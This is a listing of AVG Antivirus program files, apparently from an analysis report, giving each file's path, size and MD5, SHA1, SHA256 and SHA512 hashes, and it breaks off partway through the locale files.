                                                                                      Filesize

                                                                                      82KB

                                                                                      MD5

                                                                                      c1b4b9944329ddd89ce17be06c7d9649

                                                                                      SHA1

                                                                                      15e24ab23e390da93fc5dc78088a9b6cf861b92d

                                                                                      SHA256

                                                                                      252fbdda401bced4e6197e0edc4bb95c06e66e8554603d6c226bafb454c71a0f

                                                                                      SHA512

                                                                                      a9d3880fc5f175f64c0c41b404d76da53c402695516abb65197e111ce1b640f442cf89ec7f0ade1d5d6d69bd2c9283d64d6d56ff58b43393b897c42d94b58274

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\smartScan.js

                                                                                      Filesize

                                                                                      231KB

                                                                                      MD5

                                                                                      b890a8e177da0495db78ff65c02e9e34

                                                                                      SHA1

                                                                                      4060a4430c2a69c5f3b6266efb5c1bc9e6df4772

                                                                                      SHA256

                                                                                      1ba3b070b2df03780f42c8ba9f4d691e779487f2eb7472f9014b03c990b072d6

                                                                                      SHA512

                                                                                      4a91b490513cfcdef8bad7b76bf897f443560a65e475ffbacdf4a44fc86a4bb4fd832d5fc355fe8ddb4afae648724db5fb0a5bc0e88ac22d29682c84ed51d79b

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\software.js

                                                                                      Filesize

                                                                                      24KB

                                                                                      MD5

                                                                                      c8abd527d5824b5e793d45c7a512c86b

                                                                                      SHA1

                                                                                      2557dbef53a368f2c90da0fa47a114e257d60d98

                                                                                      SHA256

                                                                                      45f3bf97697d207fa957188897fa2a0ee689013437bcecbf5e643090a198f954

                                                                                      SHA512

                                                                                      3b819282c83fd345467eb601da67ad68fde4955867ee76ecff344fe74d1fbd78c107a823a867c5b6e02e08dd724334dd00e6ff45401d0550142d2da81e5b478d

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\svelteComponents.js

                                                                                      Filesize

                                                                                      157KB

                                                                                      MD5

                                                                                      935ffe5d544b4db5469f9683ba78f91e

                                                                                      SHA1

                                                                                      6b0dfa361d07a5617618f46e1d48e8f8ee8e71d4

                                                                                      SHA256

                                                                                      e6a8eba3a15c08ae7febfeefabfaf443a348852313ae36b3bdd0eee58d1c8b96

                                                                                      SHA512

                                                                                      6c4edd0c684d59491522ae678ea3aef5e03e1b8c8b5fc182d4623bb2db9e8728f27c9e4bf52e41713dd757b028c6dbac6189ef82a8f1c225e3d48fc8d5e9df4f

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\svelteInternal.js

                                                                                      Filesize

                                                                                      27KB

                                                                                      MD5

                                                                                      8dd1ec8e8149188895e44b08c165a296

                                                                                      SHA1

                                                                                      bd94067bdb0e40c08c06bbc05365587a311da067

                                                                                      SHA256

                                                                                      c1b7ebe8a9a0cd0758fddced75bacee608ccca07025ab6bab6d81106800bb17c

                                                                                      SHA512

                                                                                      4e1bbc1eaad31b4ff9d6d5e4b80301d999c846fd4c2ce6aef624fd77415daebb5e604df343c835f7e06346f04f1c8c2a92ef46856d0246f68829a86dee5bdd53

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\svgInline.svg

                                                                                      Filesize

                                                                                      824KB

                                                                                      MD5

                                                                                      ad5222a9fc16b1ba984b0519a92a49b3

                                                                                      SHA1

                                                                                      9668063a119fab42b73860621071be35ea3635dc

                                                                                      SHA256

                                                                                      5d6ed28fa78bae03545e3ac0479f41c21ea40b1b3fa21b1122a80b73db5204be

                                                                                      SHA512

                                                                                      cb494a9b890e114292c9c5f7bf5537f17a3661bef48de1f3664085fd4097bcbcc45a2bb2f430c5fff234c82d9337eeef5262f245d4e1edab7760d63d28ae3dd8

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\system.js

                                                                                      Filesize

                                                                                      23KB

                                                                                      MD5

                                                                                      5bc334ba0f6b9b0882599107ee38b3e3

                                                                                      SHA1

                                                                                      1b198c3ffa6b826b5f8daea05945d83e5c6e78b4

                                                                                      SHA256

                                                                                      2cc985e35d80a7ddcc4b5a3f4cbf66b5aa78b025933c3cd83e9a018078822e6e

                                                                                      SHA512

                                                                                      cd1fb5f80c3b47a5a8a6b40217fbd5fe04888d3baa512058d81d6e485b9f7cb868e396da60a5825d9d6b50c3f69b59389e8f91894386b1dbdab3261e457ba580

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\threat.ogg

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      7490b7798417364db18a28945a941db6

                                                                                      SHA1

                                                                                      ee2468aead06205e8aaf986ba9d428627fb4a713

                                                                                      SHA256

                                                                                      3dd397ac6148d654f8e4469234d8c71ef9a9192eb21ae6da4b9aa214b70f8127

                                                                                      SHA512

                                                                                      3362170f92fec1e24d05de0f72fa39c120ff9f48e67ad03981e9ba1eddcaed366228159ee622af3726646c4d74a7bd88d36f4515af47213f9e0e6207c89a8bd5

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\tray.js

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      358e8a0de7c60821a81f88aad43ed560

                                                                                      SHA1

                                                                                      76c67baef63e91183c18c06d9a5b7583d33fd5d4

                                                                                      SHA256

                                                                                      2375ae9c4e21153905f73a8f0b267a622f59e625c43a76a36aed84e26f297d8d

                                                                                      SHA512

                                                                                      0564c63a14efce0620b22b28fef4fa9b4a623679da1c9f8222c6693cf0085bd7c81864d4d737d61a80799a41f41475fb143e8766976da2e1c902fc3a1fdec84c

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\tuneup.js

                                                                                      Filesize

                                                                                      47KB

                                                                                      MD5

                                                                                      a89c6fba897dd1f05084540439863863

                                                                                      SHA1

                                                                                      f702fd33e0f1d59444ba08169f1ebccce0b2a4a1

                                                                                      SHA256

                                                                                      be5bbc94d948371272101c9fbeddc61ff465c0685be7b64697e9bd6bac147c0b

                                                                                      SHA512

                                                                                      4d034e994a04f2cceebfc976270a44a7c25f33237560b0df678e06aa2d62d6d979269b5e6634c9efa00092a918583678d5a49fdcabf5e99e6fd9f660573d05a5

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\update.js

                                                                                      Filesize

                                                                                      34KB

                                                                                      MD5

                                                                                      ef908eeec1b5e42bba8be13561d65cad

                                                                                      SHA1

                                                                                      e3dcdbad4c5eab3da0bbd6e2a7c82ec2fcc7a055

                                                                                      SHA256

                                                                                      519bd303ec540a17240d4b06d7633902e5f2f8fe02a4c552f14709051a498e04

                                                                                      SHA512

                                                                                      2706e6a0bce8fc8e26950fafc9d150b8d877e9aeba5f1bcf3743b96df5e9ff80d53e433c36c60d7c3ffff72481a021d0f4fa29bfafbba46acd56f0b455d34c9f

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\updatefile.json

                                                                                      Filesize

                                                                                      24KB

                                                                                      MD5

                                                                                      f12fd56f0e769eee4364ba33d2c13407

                                                                                      SHA1

                                                                                      94cae3062afc4b008b77e20b5ccad0fbbd5117ca

                                                                                      SHA256

                                                                                      3207a54e909eb771fe1f6e3e86b0484dc954e6c16038912dd8c894d60b6ef56b

                                                                                      SHA512

                                                                                      b00504f7c8604e70a72a5fccbe708fae2eb50bc74bc4db1d8266c0e8e76ce55f5dfb3030a7790d827373abe79becdce2c59158a6da46300c935c2ca4afc374a6

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\virusChest.js

                                                                                      Filesize

                                                                                      40KB

                                                                                      MD5

                                                                                      b2bff92d0dbf270ae4f500f8feeff970

                                                                                      SHA1

                                                                                      4fab13bb3bf93cccfe41e38b23c5781eb0368736

                                                                                      SHA256

                                                                                      ac78757311bfa1e5fc45d9321e21c86fc019aaf8219211808f46cd939c273069

                                                                                      SHA512

                                                                                      e33acf6805e174d6d8be2d4bfac3fc913183ab03531887ed33fecf214b9771bc91292c76abca6ec08e82fd5d750180517e661ce164c043bd1b40331ec10d82c5

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\webCam.js

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      60b0eb53663ee4e6662327b9a992df9e

                                                                                      SHA1

                                                                                      82cbd4a91a17069a74d3069d74765c01972dff3b

                                                                                      SHA256

                                                                                      0a8a76ce3c9d0ecb4eb35c521b271b5f0af7fa22310d321dfe8e8237146427f8

                                                                                      SHA512

                                                                                      32f11a7d41bb321def0ed39aae911090461ee56af1f2b4531c8722b5d6ce915a67557cee23ea9ef28b1574a9eb6923087fc4ae988eaf29106241cf5a4e53399c

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\resources.ini

                                                                                      Filesize

                                                                                      39B

                                                                                      MD5

                                                                                      2bd6034189730b25487d68b1b2d4425d

                                                                                      SHA1

                                                                                      25bbd5559e327ebe9e3e71173036091b379e431e

                                                                                      SHA256

                                                                                      81154d3927d7a415a35fb1f18e5ee0f16ff1e5e92ccd3cfd1e15abfb7913dea8

                                                                                      SHA512

                                                                                      10f2fa511d12338531041fcc60e11300394b0c27d7fcf25d50dc7c6201ae78671b53ac57577568ac1396035d1f83688e8997d2fe829007847d49dcd3c7add6be

                                                                                    • C:\Program Files\AVG\Antivirus\hns_tools.dll

                                                                                      Filesize

                                                                                      738KB

                                                                                      MD5

                                                                                      65ab78315e619bfbbae9ca222ee0469c

                                                                                      SHA1

                                                                                      ca279ebd97b8a57b70f6bc4e52e8c1e5982c4492

                                                                                      SHA256

                                                                                      9327ebff81e1e3ccefba1fbf43db96523bf77b74d212ee76581ccd5dd1f54d93

                                                                                      SHA512

                                                                                      4b0d334643fc165344e7f197e090195b292bef6775460a64e311ffd55142e178080d485cd54a0f2eb288c29905b063a94eb0f437edb3dba358cca0aab54974ea

                                                                                    • C:\Program Files\AVG\Antivirus\icudtl.dat

                                                                                      Filesize

                                                                                      9.9MB

                                                                                      MD5

                                                                                      80a7528515595d8b0bf99a477a7eff0d

                                                                                      SHA1

                                                                                      fde9a195fc5a6a23ec82b8594f958cfcf3159437

                                                                                      SHA256

                                                                                      6e0b6b0d9e14c905f2278dbf25b7bb58cc0622b7680e3b6ff617a1d42348736b

                                                                                      SHA512

                                                                                      c8df47a00f7b2472d272a26b3600b7e82be7ca22526d6453901ff06370b3abb66328655868db9d4e0a11dcba02e3788cc4883261fd9a7d3e521577dde1b88459

                                                                                    • C:\Program Files\AVG\Antivirus\jsbridge.dll

                                                                                      Filesize

                                                                                      27KB

                                                                                      MD5

                                                                                      30e1662322cd1e33786cd817007d7b66

                                                                                      SHA1

                                                                                      52d38cea0c898768cd5449220fcadbb344ed444b

                                                                                      SHA256

                                                                                      e2a9719c9174b8fe464b5de317034025b155fb7681dcd53e54e92a280ee97fd3

                                                                                      SHA512

                                                                                      5560ec4a90f2e68eb7144f6ff53cee86e261b628fc789185fe8b2b551d937ff9172b2bf3696f5c742be84e0defaa3b884ca61f1005a3f5d2add79caea3f4c2fb

                                                                                    • C:\Program Files\AVG\Antivirus\libEGL.dll

                                                                                      Filesize

                                                                                      404KB

                                                                                      MD5

                                                                                      2060cdb437dcdfff0c5a2a581980ad2e

                                                                                      SHA1

                                                                                      a9498ac53f77feadce4524b7bb47018d5e7b96a9

                                                                                      SHA256

                                                                                      de26ad77d4f163eb7d659e50bcc7227da271ba959e6969ccfd20ae2b54db38cf

                                                                                      SHA512

                                                                                      78157004423eaf6a6d7772132fccf1ee80367046e9535c4c3758e1ccf7900d1445f68320a448138a83c3a16b305217c179f415284133c737b1b5d53240f46b83

                                                                                    • C:\Program Files\AVG\Antivirus\libGLESv2.dll

                                                                                      Filesize

                                                                                      6.5MB

                                                                                      MD5

                                                                                      6cb160bc7da5abcedd71c8695ec75a2f

                                                                                      SHA1

                                                                                      6c35c8fa19e02f81c7a5401492c45239d91a38dd

                                                                                      SHA256

                                                                                      f3d6b13a23a6a032838f75255ed506051504e09c77121bfcf59cc570529f6c4a

                                                                                      SHA512

                                                                                      213749b77e811b5c379bba9451fdab17b091ea513a86b2b92e2dd8fc2eda5eab7856eb2e88d4768fef70cfd775b803ba6cca58094942bd0007c1d5878740d39e

                                                                                    • C:\Program Files\AVG\Antivirus\libcef.dll

                                                                                      Filesize

                                                                                      146.6MB

                                                                                      MD5

                                                                                      2cf08f01c04caa28c2c32ce7fdad713f

                                                                                      SHA1

                                                                                      ba424b36774fc7864c2fe2ba76e586858d2807d9

                                                                                      SHA256

                                                                                      d784ec667a92778b3738fdc7b78f6560f54293764b26773bb022c4bc46c9805a

                                                                                      SHA512

                                                                                      58de0b5ebf83f0888f55508bdbe7785fd7cdd29dc18692c2edd61e25fbac002bea25835b623836430f62cdcd0b6c1af8680e31cb911fdbc8d529943d63f300c3

                                                                                    • C:\Program Files\AVG\Antivirus\libcrypto-3-x64.dll

                                                                                      Filesize

                                                                                      6.0MB

                                                                                      MD5

                                                                                      85640729c6945bbce586d0e1c44f9a2a

                                                                                      SHA1

                                                                                      0fae9710df85a61bb629da86c868cedc91404acc

                                                                                      SHA256

                                                                                      85dd88fb36758aba6707bb547f0b94f6df33fc7bcc10b7b433eec78cf68cabb6

                                                                                      SHA512

                                                                                      b0b282f77cecb082bb92c17a4f059f922f552ca71b68e86a8201661b0eee1aefc23dda3f7eaa776bfcca41e96e0c112c684c412b1e9ed64467fca06df29b4084

                                                                                    • C:\Program Files\AVG\Antivirus\libssl-3-x64.dll

                                                                                      Filesize

                                                                                      814KB

                                                                                      MD5

                                                                                      e212f2dd51f1d0ae48d8e4e37e769db4

                                                                                      SHA1

                                                                                      c2d486ff22c27c667a7c314f886a3e126b02997d

                                                                                      SHA256

                                                                                      68a1c71e9d15b0c76f0b7cf5ef013657142ba11ca4cde08994ca907d15fca956

                                                                                      SHA512

                                                                                      bd6a53a0cce493754bdff59960928eb0f639dc1ede4d5e5410b6033e6af3231302a59c22dea587d8ed693b2c2ebf9f43f9ef00c6f35a11e5a4e59836ab86f380

                                                                                    • C:\Program Files\AVG\Antivirus\libwaapi.dll

                                                                                      Filesize

                                                                                      1.0MB

                                                                                      MD5

                                                                                      badce0807bcdfbe759790ea68bc38196

                                                                                      SHA1

                                                                                      b0c5fcf774ddce22c337658583fc93a50ccfcf24

                                                                                      SHA256

                                                                                      959da2f3c415416b1e272c9b1e3210cd28fb308e8f61b4a6e0970f5856a7d268

                                                                                      SHA512

                                                                                      20f53cd0f9be553a436477e3aea4a64ad1e0cc99b4c9c8658971c1bde90fd95d8a739fae40c8dacd6c60f7e19fb285944474442a5455cf80e1c9ff5e926dbf4d

                                                                                    • C:\Program Files\AVG\Antivirus\libwaheap.dll.ipending.33edda96

                                                                                      Filesize

                                                                                      100KB

                                                                                      MD5

                                                                                      3380fb5ef6fcaf34070a71d52aea0403

                                                                                      SHA1

                                                                                      c6891e8894cd70b0f1648bea3197dc08c2661c50

                                                                                      SHA256

                                                                                      f456b99b1cc7bca914b27b4c2b602bbffa24e5f6204e8286f227f5a2cf9fbad0

                                                                                      SHA512

                                                                                      ad06fbaeffd9f98999eb4ccc3f8620c516dde410ee5f0bb5ccb0eb2e745b221b99e74c676759f6fff34980f342ea583cc995462360278e9be752ce0bc1063067

                                                                                    • C:\Program Files\AVG\Antivirus\libwalocal.dll

                                                                                      Filesize

                                                                                      1.8MB

                                                                                      MD5

                                                                                      60332ba43062b2f225f0b9c738457607

                                                                                      SHA1

                                                                                      89c39a465b0390b8815ecc7c23a8316690898f5f

                                                                                      SHA256

                                                                                      f44ee1aeb5713a578b09a90ebd9735f79c4b5ad497a2f73f20355752f85c3e0b

                                                                                      SHA512

                                                                                      98f47fb3173d534ef5c03395708d5a395f1373ab2b61aaa6a5e3e79c58869615ebb83bbf1dcc2a41af27ba2f3423430b1b08e4014986eebc9f1757d53fd4e7e7

                                                                                    • C:\Program Files\AVG\Antivirus\libwaresource.dll

                                                                                      Filesize

                                                                                      4.4MB

                                                                                      MD5

                                                                                      a20a4d4e29b3b3237304b2022a99a652

                                                                                      SHA1

                                                                                      657a79a785f25f5d2df44249e89cd55ba53b0a73

                                                                                      SHA256

                                                                                      f5fa77eba62dbe16cadf3120c397212224c930da261901b060ce8f67ecbeb014

                                                                                      SHA512

                                                                                      6cba36d27e108076fc3172865fe350851fcfa3566002aeee5e99360e60de572cf8c0028ed0f848a6d80b165d349e3f95aa85e111ff586b98e588b467b426dc29

                                                                                    • C:\Program Files\AVG\Antivirus\libwautils.dll

                                                                                      Filesize

                                                                                      3.3MB

                                                                                      MD5

                                                                                      28511c1f6b88eabacc76f465493d20ce

                                                                                      SHA1

                                                                                      bfb375fa5866f1ce4791fed577b32efc7c2852cd

                                                                                      SHA256

                                                                                      cc1b23ef6948829b9831cbb8bf25ab50d57335c82e2d360259fbbdbfd4486691

                                                                                      SHA512

                                                                                      37dbae4be24dbbab421e350446f34afb6f2e4dce8701f9c9f97f690191e90646d0664b992a6485caa3a4dd6b330841c75256f98d374ff749f5cbbcc8e04ca454

                                                                                    • C:\Program Files\AVG\Antivirus\libwavmodapi.dll

                                                                                      Filesize

                                                                                      4.5MB

                                                                                      MD5

                                                                                      89b0525a581b22b29964efe5febc957e

                                                                                      SHA1

                                                                                      2f94ab12ef3232396e843cf44bcd0bea1d1cb14a

                                                                                      SHA256

                                                                                      21588e3e43134224e3c571f7fe6d7cc790323142129aba3a24249706103a1d05

                                                                                      SHA512

                                                                                      ec4c8d8998ffa92030d8b38ce176362ac634135d5ac2e1a61d164ad213c8e494d64e65ac9f928c7fec50513fa16e0a36770590b72ad664e1412c955e278c9a0f

                                                                                    • C:\Program Files\AVG\Antivirus\locales\am.pak

                                                                                      Filesize

                                                                                      453KB

                                                                                      MD5

                                                                                      ad4acdfe76c998b945642b9af2756ea8

                                                                                      SHA1

                                                                                      025ea273d63fa71f3c10c578b1a3f657dbdb3f96

                                                                                      SHA256

                                                                                      4dbde72ecf65ac84b6c01251d37c425c4cedc00e3cd9cd40c0bd5a6081359b64

                                                                                      SHA512

                                                                                      81f71679d2ee24ef8124e81f39f49b113a157c88af093a6f571c34b67d19933c200d095ab65ce099000f132fd2a04a44829047816c1e53a42ed4c5b517e90fc3

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ar.pak

                                                                                      Filesize

                                                                                      479KB

                                                                                      MD5

                                                                                      98230353d1463eee93d64a4856f7008a

                                                                                      SHA1

                                                                                      10d98e7d0e095dcd947fbe0b8d771ed1574e3ca0

                                                                                      SHA256

                                                                                      36f41a346ed07708ce12d54e5a4c4612f49a375155d1655a23c52256838617cf

                                                                                      SHA512

                                                                                      53b9d1b50bb79e245d74dd30cf66da4715c81ef63af3d569eace6329eec00356eacb7357271778e837b60fee08deba2ba445b8ea74619a955bfa2b8e5c05358c

                                                                                    • C:\Program Files\AVG\Antivirus\locales\bg.pak

                                                                                      Filesize

                                                                                      518KB

                                                                                      MD5

                                                                                      dec816e6e65e705be74917f249e43fd9

                                                                                      SHA1

                                                                                      6f90b68e6b1d904b3e41892cdab1923f4f868376

                                                                                      SHA256

                                                                                      ea323024091753a5576a343e46d19bfbf9939122bdde53d91d7dfdbbea5a9c68

                                                                                      SHA512

                                                                                      d21fcaf4fe07f4cc6c369d7cc5a1bf06de5ddf7e2433310b45b53aac340259f5276e1e86e15591ede8d4d5c05d719871d586942664ffc76eba1712ef3145395b

                                                                                    • C:\Program Files\AVG\Antivirus\locales\bn.pak

                                                                                      Filesize

                                                                                      671KB

                                                                                      MD5

                                                                                      c7b9e899ee655e2cec7a49b9cb2300a2

                                                                                      SHA1

                                                                                      5c471604d1a755a393f1ca2f1acafd6e014792be

                                                                                      SHA256

                                                                                      522e7a2e1f7d8e49b5632759cb5dae269578edc522689bdbcb23b74750f53e77

                                                                                      SHA512

                                                                                      b56e1afb9c3f67ce891eb0215a68cb3588a82fe51e0dd2f9b18335f2312bad156cb3be032caf641a7a39ddc0a41038f96f7b36469ca327051bfcda620145f6df

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ca.pak

                                                                                      Filesize

                                                                                      319KB

                                                                                      MD5

                                                                                      8fcb9f17f850f0dcffa2512236e25790

                                                                                      SHA1

                                                                                      429b36872ed7b655d745fd8efba6b5239ad340a0

                                                                                      SHA256

                                                                                      c79b92ba066cf5414fc37795e6a76e966c23143bd3c48c0cf5f61aedd5cdafef

                                                                                      SHA512

                                                                                      1553cbd7fa4fc87341bfca39cf58e8834d6c3100571e34bcd5a1961884776abb69592c627cef414b918e8cd4bd709a83c4af2bed5d5c4a84b9509e896b8fbf42

                                                                                    • C:\Program Files\AVG\Antivirus\locales\cs.pak

                                                                                      Filesize

                                                                                      325KB

                                                                                      MD5

                                                                                      0161995c04f022922e5c036d374eceb1

                                                                                      SHA1

                                                                                      5294111882537c10e4ea4df72b3508fbf2d2bc30

                                                                                      SHA256

                                                                                      3f2e5a65ebf8938ff4e9676b12573b23c72501761f1bff4d5ae466b68c85130c

                                                                                      SHA512

                                                                                      c04c549e23d2ff33cc424746f1a1a6d70e4660612d857070810c7ad9c7021aace09acf62e0248f139acfa2369fc511b4f329e14f3d6126813ff66ee7d44b3611

                                                                                    • C:\Program Files\AVG\Antivirus\locales\da.pak

                                                                                      Filesize

                                                                                      294KB

                                                                                      MD5

                                                                                      f1e5e7dc819670c061902a3daa17daa2

                                                                                      SHA1

                                                                                      583ca07af55f3055ce127b81fd825fe45cb722ca

                                                                                      SHA256

                                                                                      cefdaea7b486364291fad01ff402ab8098e2e13bc73b2bbeac25c8a9daba8df8

                                                                                      SHA512

                                                                                      b8e8e79f052d5165446a8392a4836fd6915cb87cf199c499e9b4e767e6e60e4e94d601420e798ed3b7354c8ca91304b1d062332cfd5016614705aa57462aec83

                                                                                    • C:\Program Files\AVG\Antivirus\locales\de.pak

                                                                                      Filesize

                                                                                      317KB

                                                                                      MD5

                                                                                      6932a8734c0ef9949fe0dc3b2282e16d

                                                                                      SHA1

                                                                                      817c17d5592129b6277075845557148e1e59cc78

                                                                                      SHA256

                                                                                      88581d49e6c83ef74fe4aeed438c0380f321d9eaf3b8ef210d39f8378836a1c1

                                                                                      SHA512

                                                                                      076f2741f28f76fb0da8fa35bb55418874db7e2304dd09afc0cc818b0c5e645831cb0c3ebf97eac474339c584e640f562b4699f54496ebd761e3733777490b6b

                                                                                    • C:\Program Files\AVG\Antivirus\locales\el.pak

                                                                                      Filesize

                                                                                      566KB

                                                                                      MD5

                                                                                      c6009c7b038068b61aa6275b4cb9f860

                                                                                      SHA1

                                                                                      4b77f7f822f4ee15c57dbe873c6f7549fb608028

                                                                                      SHA256

                                                                                      efe6a9d8dcf76f5286bec0496209f59da3de6ab6e355a183b69a7e4bd5d36cc2

                                                                                      SHA512

                                                                                      d3d5eb21caaf361bb92e0453ee1db4ef9349e071be2736589a8d2f5cd587e85d33c7d65f01342758dede0ab0a037b294d7e263d82f60c29e583ea1c30c9f3fa8

                                                                                    • C:\Program Files\AVG\Antivirus\locales\en-GB.pak

                                                                                      Filesize

                                                                                      260KB

                                                                                      MD5

                                                                                      314c49194e366808b2b36253fdbd7714

                                                                                      SHA1

                                                                                      e9e8ba1fcfe91b80e232899c69844282d39d0d23

                                                                                      SHA256

                                                                                      411a729d9288a62780c32d6bf5f4cf0fd8d221ff341ce79c2eca25dfa03c9821

                                                                                      SHA512

                                                                                      5c24bcfb043ec09f31e5c8e640d1bed4932f9560d68256d4409d5d51a8948af3381e2bbf164515a2e35cd7e6ab5349d9fcfb4916bd8d11453da9d69e7cd8f5de

                                                                                    • C:\Program Files\AVG\Antivirus\locales\en-US.pak

                                                                                      Filesize

                                                                                      264KB

                                                                                      MD5

                                                                                      0a70bdd8c0efc740818bdb82993bab85

                                                                                      SHA1

                                                                                      d84b6092664894f42e1afe042abc946a3e0d2e65

                                                                                      SHA256

                                                                                      21fa942a5f4f26996396f0d84807b6f8c01afd5809e2da33487bbecd0a6d13ef

                                                                                      SHA512

                                                                                      085c21045f8fea63a80678069af61e4273420bb6645a833319d58248e61adeee3cfca23edcb7adfc2dd59621184035e3f9e252db8d5840e6f6727e0e05b5fd63

                                                                                    • C:\Program Files\AVG\Antivirus\locales\es-419.pak

                                                                                      Filesize

                                                                                      312KB

                                                                                      MD5

                                                                                      4861cfbe34644b1aa3a62e0b8a955b28

                                                                                      SHA1

                                                                                      66497635946e50bb17483db226d9d9fa0e80db7c

                                                                                      SHA256

                                                                                      ef0a523bcfa4d3a1b7472947a1f2a0a68e24c628386f7f0056ca4404d82481f1

                                                                                      SHA512

                                                                                      162069b7b670d7bf68ba8276d2ce0b042a4cb0f19f2f66edbc8af00dbd97e084ea9a755b817a82d77e83e63d97e79d7e50eabaf67c880b4aa85b3b6af0cce20d

                                                                                    • C:\Program Files\AVG\Antivirus\locales\es.pak

                                                                                      Filesize

                                                                                      315KB

                                                                                      MD5

                                                                                      44c080e276c1c44cde4dee4c576a4358

                                                                                      SHA1

                                                                                      217c766a2ed03b9a9f2f4d1e2c148f10d836cca3

                                                                                      SHA256

                                                                                      85862323a3128490a2c1be66a36480f7eb73a2294d62ef4ff38ae868c034db4f

                                                                                      SHA512

                                                                                      333acd81c4b1fb5f24f0b0b2f5192175586fdd455895bdfd7092425cd877a844aebe3e74aa37060c849c5821fc5174a2471d7db95a6e7098e43e177db70ef92d

                                                                                    • C:\Program Files\AVG\Antivirus\locales\et.pak

                                                                                      Filesize

                                                                                      282KB

                                                                                      MD5

                                                                                      d045af9a8b85c6ac73f60e9fdc16590e

                                                                                      SHA1

                                                                                      874293f1b5d1b6e2641d9dbea59b4e1b8f377752

                                                                                      SHA256

                                                                                      241f3e5286b25864081f50edb93c4693bf001f04d7c7b98f5c4921f768cd7e94

                                                                                      SHA512

                                                                                      b8f9f59f6519c5839d4da668a16062100be75317c4275bbb50e1afc4b6b66ecab7268054682bfdd63c5a71dae8ae00e80eff3eaab161c2e35a3651988ad38413

                                                                                    • C:\Program Files\AVG\Antivirus\locales\fa.pak

                                                                                      Filesize

                                                                                      457KB

                                                                                      MD5

                                                                                      78c7adf045b3d8a05c6f6519154cdef0

                                                                                      SHA1

                                                                                      694fd63b612fba0267e1deab41b8a87ee0649dc6

                                                                                      SHA256

                                                                                      05a98b8dc3b6d5e3a224e17c144d873c3b84c6e704fd2b8dd659e2099789f9a3

                                                                                      SHA512

                                                                                      cea96bd1621550c6108695d51a317bad4054bac9b564e45f2b0a16cea328be15475cf2ec033c33106a184215fe7180fdbbbfab709b782f43919f68b976d8cb99

                                                                                    • C:\Program Files\AVG\Antivirus\locales\fi.pak

                                                                                      Filesize

                                                                                      291KB

                                                                                      MD5

                                                                                      59d49ab548b74d85bae165b8cc15b073

                                                                                      SHA1

                                                                                      d1946469ab92270bc99b7ed863ac723cf676f050

                                                                                      SHA256

                                                                                      fa171dcc44baf46cd4331d0a833172185ff6a166a31ab4f9890eb0832e15cbf2

                                                                                      SHA512

                                                                                      40b9018eac2f55828f3ce3b50e6428ed545f8453c51b193614137c035ab9853f63ae9c82c2ed1d6f9a4aee265238478bb46f468b08442d6cd4d0d49c9e1576bf

                                                                                    • C:\Program Files\AVG\Antivirus\locales\fil.pak

                                                                                      Filesize

                                                                                      325KB

                                                                                      MD5

                                                                                      2dc3f1409e7f6a3fdb3aa55c1bceafcf

                                                                                      SHA1

                                                                                      76fdde6ee054a19f7c76046bd41390004bc6ac41

                                                                                      SHA256

                                                                                      fab8b112187fcf9ba5102ff0aac2f5eec63a646c8bf808fc5a2e4e08b9c62a83

                                                                                      SHA512

                                                                                      5ee1981ac59456a623297de3257219b69bc053aea71fa4ae1486bb6f0689f7adb5e78daa17d8d338755eadb7164b7d7f50bd6bbc004c80d00ec4fe56603750c0

                                                                                    • C:\Program Files\AVG\Antivirus\locales\fr.pak

                                                                                      Filesize

                                                                                      342KB

                                                                                      MD5

                                                                                      39df7277c2854d60b4b61bc11add4188

                                                                                      SHA1

                                                                                      865db185756772df35af31dcdf78dab7fb9f8549

                                                                                      SHA256

                                                                                      1ffb04ba6986f4a25f5191da50939cfe48d1581388148b7f64d3c10a124439d8

                                                                                      SHA512

                                                                                      de627a69981b4a4604a587a610b59a022f6fc4715cbad7be59cb444db7b42e0337cbbc42e9c0a5fea84bff066be3273a8eb251c578e5457a9ddf19f90a8c71e0

                                                                                    • C:\Program Files\AVG\Antivirus\locales\gu.pak

                                                                                      Filesize

                                                                                      644KB

                                                                                      MD5

                                                                                      349ca76d987c9e2c7fb00966aa034357

                                                                                      SHA1

                                                                                      3bba7ea00e4f4d9768dd2311ec1ac59cc8239652

                                                                                      SHA256

                                                                                      79fa0f068f09ed239a8e0c3f1da0b35fa1f86622f9fa47721e13656696184e88

                                                                                      SHA512

                                                                                      330488349b8a7d9503df180611d97c4d449788284304f4bd231ec97c77d5c2221adecbf6a9486d2a8bee37b6e2c72ad22cea3937e95c1c3178c9dc6c522a52d8

                                                                                    • C:\Program Files\AVG\Antivirus\locales\he.pak

                                                                                      Filesize

                                                                                      397KB

                                                                                      MD5

                                                                                      ea6c8dd5fb4007b5b5a692b857693d46

                                                                                      SHA1

                                                                                      e142738f399bf5aa7c19d478a7def3d270e61851

                                                                                      SHA256

                                                                                      7652d063f1630e33228809834f71e6e2ffec75c472ec66b6ed767bd98886f928

                                                                                      SHA512

                                                                                      a77fec4ea0fcea2de4863eed319abe2f4143b5fd345aa951c94068f862bceccfe16575271bd423bf09b7116c6bbf7faf4daa59bfd0025797ae9202a311637e1f

                                                                                    • C:\Program Files\AVG\Antivirus\locales\hi.pak

                                                                                      Filesize

                                                                                      668KB

                                                                                      MD5

                                                                                      e7506ea783c56cf5432618080371868d

                                                                                      SHA1

                                                                                      91f7c1c26a7eada6af72089252c2a0153066fc03

                                                                                      SHA256

                                                                                      2418a772d39e45fbea52182965a901364ddcd5459a920c8dcb56c2844954e536

                                                                                      SHA512

